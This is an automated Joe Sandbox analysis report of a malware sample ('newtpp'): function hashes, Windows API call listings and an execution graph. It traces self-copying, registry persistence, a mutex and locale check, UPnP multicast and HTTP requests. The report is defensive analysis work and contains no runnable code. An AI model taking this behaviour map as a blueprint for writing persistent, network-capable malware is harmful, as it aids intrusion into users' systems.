                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 442028454-0
                                                                                                                    • Opcode ID: ad2f4acdc7dc609d23620ad603f7b9ac0ec9968bfa9634d541bf1612e6ff1dda
                                                                                                                    • Instruction ID: b83d763b1b95064d17473309c927232932c49c75998401e70db37280cdfd902f
                                                                                                                    • Opcode Fuzzy Hash: ad2f4acdc7dc609d23620ad603f7b9ac0ec9968bfa9634d541bf1612e6ff1dda
                                                                                                                    • Instruction Fuzzy Hash: 46318CB4E00208EFDB00CF94EC85FAEB775BB48300F218569E515A7390C774AA51CB59
                                                                                                                    Function 00408A90 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _allshl
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 435966717-0
                                                                                                                    • Opcode ID: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
                                                                                                                    • Instruction ID: 2f682f979519ea9f46037cdaf014f1fa89077d02b7b0d9f1a8f9fce332e03f2e
                                                                                                                    • Opcode Fuzzy Hash: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
                                                                                                                    • Instruction Fuzzy Hash: 62F03672A11419D79720EFFFD4424CAF7E59F88354B118676F818E3270E5709D1146F5
                                                                                                                    Function 00401330 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42synchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                                                                    • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                                                                    • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                                                                      • Part of subcall function 0040A1B0: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040A20B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                                                    • String ID: pdu
                                                                                                                    • API String ID: 309973729-2320407122
                                                                                                                    • Opcode ID: c39a517e5d4f3b53a3b778486be7aa7f806f5e58db1bfdeefdb0bb5bfa2d2843
                                                                                                                    • Instruction ID: 8798272c393d99dde58c69795aa0ec1d050c8eff8ee51a61ed5db2294712bea8
                                                                                                                    • Opcode Fuzzy Hash: c39a517e5d4f3b53a3b778486be7aa7f806f5e58db1bfdeefdb0bb5bfa2d2843
                                                                                                                    • Instruction Fuzzy Hash: 400186765003109BCB21AF55ECC4E9B7779AF48311B044679FD056B396C638E85487A5
                                                                                                                    Function 00406320 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDriveTypeW.KERNEL32(004062FF), ref: 0040632D
                                                                                                                    • QueryDosDeviceW.KERNEL32(004062FF,?,00000208), ref: 0040636C
                                                                                                                    • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406384
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DeviceDriveQueryType
                                                                                                                    • String ID: \??\
                                                                                                                    • API String ID: 1681518211-3047946824
                                                                                                                    • Opcode ID: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
                                                                                                                    • Instruction ID: affcc5b958b6168f9f245bae438771e9e0bc574488939cd978d138ae5b874539
                                                                                                                    • Opcode Fuzzy Hash: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
                                                                                                                    • Instruction Fuzzy Hash: 4101ECB0A4020CEBCB20DF55DD496DEB7B5AB04704F01C0BAAA09A7280D6759AD5CF99
                                                                                                                    Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ioctlsocket.WS2_32 ref: 0040112B
                                                                                                                    • recvfrom.WS2_32 ref: 0040119C
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3980219359-0
                                                                                                                    • Opcode ID: 9043bbde74ed34bf2cc191a38aea973bc9bd065bac7bbf52c4b9ffe402cd0893
                                                                                                                    • Instruction ID: e1641215121ef27e00d374ead4771de002ae7678dd3977a0c2b5eb1dd4af8410
                                                                                                                    • Opcode Fuzzy Hash: 9043bbde74ed34bf2cc191a38aea973bc9bd065bac7bbf52c4b9ffe402cd0893
                                                                                                                    • Instruction Fuzzy Hash: BE21B1B11043016FD304DF65D884A6BB7E8AF88318F004A3EF559A6291E774D948C7AA
                                                                                                                    Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                                                    • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                                                    • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2074799992-0
                                                                                                                    • Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                    • Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
                                                                                                                    • Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                    • Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA
                                                                                                                    Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                                                    • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                                                    • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Send$ErrorLastSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2121970615-0
                                                                                                                    • Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                    • Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
                                                                                                                    • Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                    • Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A
                                                                                                                    Function 0040D410 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0040D429
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040D458
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040D467
                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 0040D474
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3102160386-0
                                                                                                                    • Opcode ID: 8282c1fc67bed24bc2a31477c864fcafb026bcbe456c45579f2b949671041cbb
                                                                                                                    • Instruction ID: 6cfc4b79706d1bba1c4fbc1f32f5c608acb329628ab24e105d00911b1e03cc11
                                                                                                                    • Opcode Fuzzy Hash: 8282c1fc67bed24bc2a31477c864fcafb026bcbe456c45579f2b949671041cbb
                                                                                                                    • Instruction Fuzzy Hash: AC112D74D00208EFDB08DF94D984A9EBB75FF48309F2081A9E806AB341D734EE95DB95
                                                                                                                    Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2223660684-0
                                                                                                                    • Opcode ID: 7e6606f5c14d1b9ede2abea3a5762152510b51c5bdf13f408023d0105cc90a62
                                                                                                                    • Instruction ID: 0184f799374b3cbd514a588550e5351e3808897b1395f0a2de410330185c2ead
                                                                                                                    • Opcode Fuzzy Hash: 7e6606f5c14d1b9ede2abea3a5762152510b51c5bdf13f408023d0105cc90a62
                                                                                                                    • Instruction Fuzzy Hash: DF01F7352423009FC3209F26EC44ADB77E8AF49711F04443EE80697650EB34E545DB28
                                                                                                                    Function 00406FE0 Relevance: 6.0, APIs: 4, Instructions: 22memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,00407A2A), ref: 00406FE8
                                                                                                                    • SysAllocString.OLEAUT32(00416268), ref: 00406FF3
                                                                                                                    • CoUninitialize.OLE32 ref: 00407018
                                                                                                                      • Part of subcall function 00407030: SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407012
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String$Free$AllocInitializeUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 459949847-0
                                                                                                                    • Opcode ID: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
                                                                                                                    • Instruction ID: 74c6c169e6652ce6f6b7715e91ddbb7e77275cafe0f94b55a583b47f3cb3299b
                                                                                                                    • Opcode Fuzzy Hash: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
                                                                                                                    • Instruction Fuzzy Hash: 13E01275D44208FBD704AFA0DD0EB9D77789B05341F1081A5F905922A0DAF95E80DB56
                                                                                                                    Function 00407030 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004072C0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004072E0
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFreeInstanceString
                                                                                                                    • String ID: Microsoft Corporation
                                                                                                                    • API String ID: 586785272-3838278685
                                                                                                                    • Opcode ID: 2f3cc9baeef0c7a1245b843303fd4ce0e44c974243be678b414a87c4b8a79f3c
                                                                                                                    • Instruction ID: 457fc6c08a50d419230b37d5b6ce52bdab008108e04107557a49afcd29d8ec7c
                                                                                                                    • Opcode Fuzzy Hash: 2f3cc9baeef0c7a1245b843303fd4ce0e44c974243be678b414a87c4b8a79f3c
                                                                                                                    • Instruction Fuzzy Hash: 4491FC75E0410ADFCB04DB94D890AAFB7B5BF48304F2081A9E515B73E4D734AE82CB66
                                                                                                                    Function 0040D980 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040DBC0: memset.NTDLL ref: 0040DBE8
                                                                                                                      • Part of subcall function 0040DBC0: InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
                                                                                                                      • Part of subcall function 0040DBC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
                                                                                                                      • Part of subcall function 0040DBC0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
                                                                                                                      • Part of subcall function 0040DBC0: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
                                                                                                                      • Part of subcall function 0040DBC0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
                                                                                                                      • Part of subcall function 0040DBC0: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
                                                                                                                      • Part of subcall function 0040DBC0: InternetCloseHandle.WININET(00000000), ref: 0040DDB7
                                                                                                                      • Part of subcall function 0040DAB0: SysAllocString.OLEAUT32(00000000), ref: 0040DADE
                                                                                                                      • Part of subcall function 0040DAB0: CoCreateInstance.OLE32(00412408,00000000,00004401,004123F8,00000000), ref: 0040DB06
                                                                                                                      • Part of subcall function 0040DAB0: SysFreeString.OLEAUT32(00000000), ref: 0040DBA1
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040DA65
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                                                    • String ID: %S%S
                                                                                                                    • API String ID: 1017111014-3267608656
                                                                                                                    • Opcode ID: 2a44cf61d891e8738e9fac40afdb9ff2254c365f5810798eb153ce2e68fa7b5b
                                                                                                                    • Instruction ID: beec9ad9f3848cf7af9d47610756df11a49d132dd1bd9a4578eda8885410465d
                                                                                                                    • Opcode Fuzzy Hash: 2a44cf61d891e8738e9fac40afdb9ff2254c365f5810798eb153ce2e68fa7b5b
                                                                                                                    • Instruction Fuzzy Hash: 4941E6B5E002099FCB04DBE4C885AEFB7B9BF48304F148569E505B7391D738AA85CFA5
                                                                                                                    Function 0040D640 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407A25), ref: 0040D64A
                                                                                                                      • Part of subcall function 0040D710: socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
                                                                                                                      • Part of subcall function 0040D710: htons.WS2_32(0000076C), ref: 0040D760
                                                                                                                      • Part of subcall function 0040D710: inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
                                                                                                                      • Part of subcall function 0040D710: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
                                                                                                                      • Part of subcall function 0040D710: bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
                                                                                                                      • Part of subcall function 0040D710: lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
                                                                                                                      • Part of subcall function 0040D710: sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
                                                                                                                      • Part of subcall function 0040D710: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
                                                                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
                                                                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA65
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                                                    • String ID: TCP$UDP
                                                                                                                    • API String ID: 1519345861-1097902612
                                                                                                                    • Opcode ID: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
                                                                                                                    • Instruction ID: b9d850b43d5b9198a526a111fa4c70c7537d99c61ef063864e94ee7d89292dcb
                                                                                                                    • Opcode Fuzzy Hash: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
                                                                                                                    • Instruction Fuzzy Hash: A91181B4D01208EBDB00EBD4D945FEE7374AB44308F1089BAE505772C2D7799E58CB9A
                                                                                                                    Function 00405EB0 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(00415E30,?,?,?), ref: 00405EBF
                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405EFE
                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F73
                                                                                                                    • LeaveCriticalSection.KERNEL32(00415E30), ref: 00405F90
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1685573695.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1685561276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685587777.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1685600089.0000000000414000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_newtpp.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSectionmemcpy$EnterLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 469056452-0
                                                                                                                    • Opcode ID: 11a0381e7cc2a19f3e704b5167a0aa4c73886e0f3014e3589bcc626491d58d19
                                                                                                                    • Instruction ID: 4abcbf5e8f17672ba879e37304839ab4c0f114d9c1813139277d8bca2654c775
                                                                                                                    • Opcode Fuzzy Hash: 11a0381e7cc2a19f3e704b5167a0aa4c73886e0f3014e3589bcc626491d58d19
                                                                                                                    • Instruction Fuzzy Hash: 71217C35D04609EBCB04DF94D985BDEBBB1EB48304F1481AAE80567281D37CAA95CF9A

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:13.9%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:1456
                                                                                                                    Total number of Limit Nodes:37
                                                                                                                    execution_graph 6042 40e121 6044 40e12a 6042->6044 6043 40e21d 6044->6043 6045 40e193 lstrcmpiW 6044->6045 6046 40e213 SysFreeString 6045->6046 6047 40e1a6 6045->6047 6046->6043 6048 40df10 2 API calls 6047->6048 6050 40e1b4 6048->6050 6049 40e205 6049->6046 6050->6046 6050->6049 6051 40e1e3 lstrcmpiW 6050->6051 6052 40e1f5 6051->6052 6053 40e1fb SysFreeString 6051->6053 6052->6053 6053->6049 5924 406045 5926 405fbe 5924->5926 5925 40604a LeaveCriticalSection 5926->5925 5927 40a220 8 API calls 5926->5927 5928 40601c 5927->5928 5928->5925 5929 407b49 5930 407b52 5929->5930 5931 407b61 34 API calls 5930->5931 5932 408996 5930->5932 5933 40a28e 5934 40a1b0 __aligned_recalloc_base 3 API calls 5933->5934 5937 40a24d 5934->5937 5935 40a262 5936 409fa0 __aligned_recalloc_base 7 API calls 5936->5937 5937->5935 5937->5936 5938 40a264 memcpy 5937->5938 5938->5937 4353 407590 Sleep CreateMutexA GetLastError 4354 4075c6 ExitProcess 4353->4354 4355 4075ce 6 API calls 4353->4355 4356 407673 4355->4356 4357 40795a Sleep 4355->4357 4499 40e730 GetLocaleInfoA strcmp 4356->4499 4410 40c7d0 4357->4410 4362 407ae4 4363 407975 9 API calls 4413 405bc0 InitializeCriticalSection CreateFileW 4363->4413 5710 407440 4363->5710 5717 405880 4363->5717 5726 406bc0 Sleep GetModuleFileNameW 4363->5726 4364 407680 ExitProcess 4365 407688 ExpandEnvironmentStringsW wsprintfW CopyFileW 4367 407779 Sleep wsprintfW CopyFileW 4365->4367 4368 4076dc SetFileAttributesW RegOpenKeyExW 4365->4368 4370 4077c1 SetFileAttributesW RegOpenKeyExW 4367->4370 4371 40785e Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4367->4371 4368->4367 4369 407718 wcslen RegSetValueExW 4368->4369 4369->4367 4373 40774d RegCloseKey 4369->4373 4370->4371 4374 4077fd wcslen RegSetValueExW 4370->4374 4371->4357 4376 4078bd SetFileAttributesW RegOpenKeyExW 4371->4376 4501 40e980 memset memset CreateProcessW 4373->4501 4374->4371 4378 407832 RegCloseKey 4374->4378 4376->4357 4380 4078f9 wcslen RegSetValueExW 4376->4380 4382 40e980 6 API calls 4378->4382 4380->4357 4384 40792e RegCloseKey 4380->4384 4387 40784b 4382->4387 4385 40e980 6 API calls 4384->4385 4389 407947 4385->4389 4386 407771 ExitProcess 4387->4371 4390 407856 ExitProcess 4387->4390 4388 407a2a CreateEventA 4445 40bf00 4388->4445 4389->4357 4392 407952 ExitProcess 4389->4392 4400 40d160 339 API calls 4401 407a8a 4400->4401 4402 40d160 339 API calls 4401->4402 4403 407aa6 4402->4403 4404 40d160 339 API calls 4403->4404 4405 407ac2 4404->4405 4490 40d2d0 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4405->4490 4407 407ad2 4507 40d410 4407->4507 4516 40c7a0 4410->4516 4414 405ce5 4413->4414 4415 405bf8 CreateFileMappingW 4413->4415 4427 40d640 CoInitializeEx 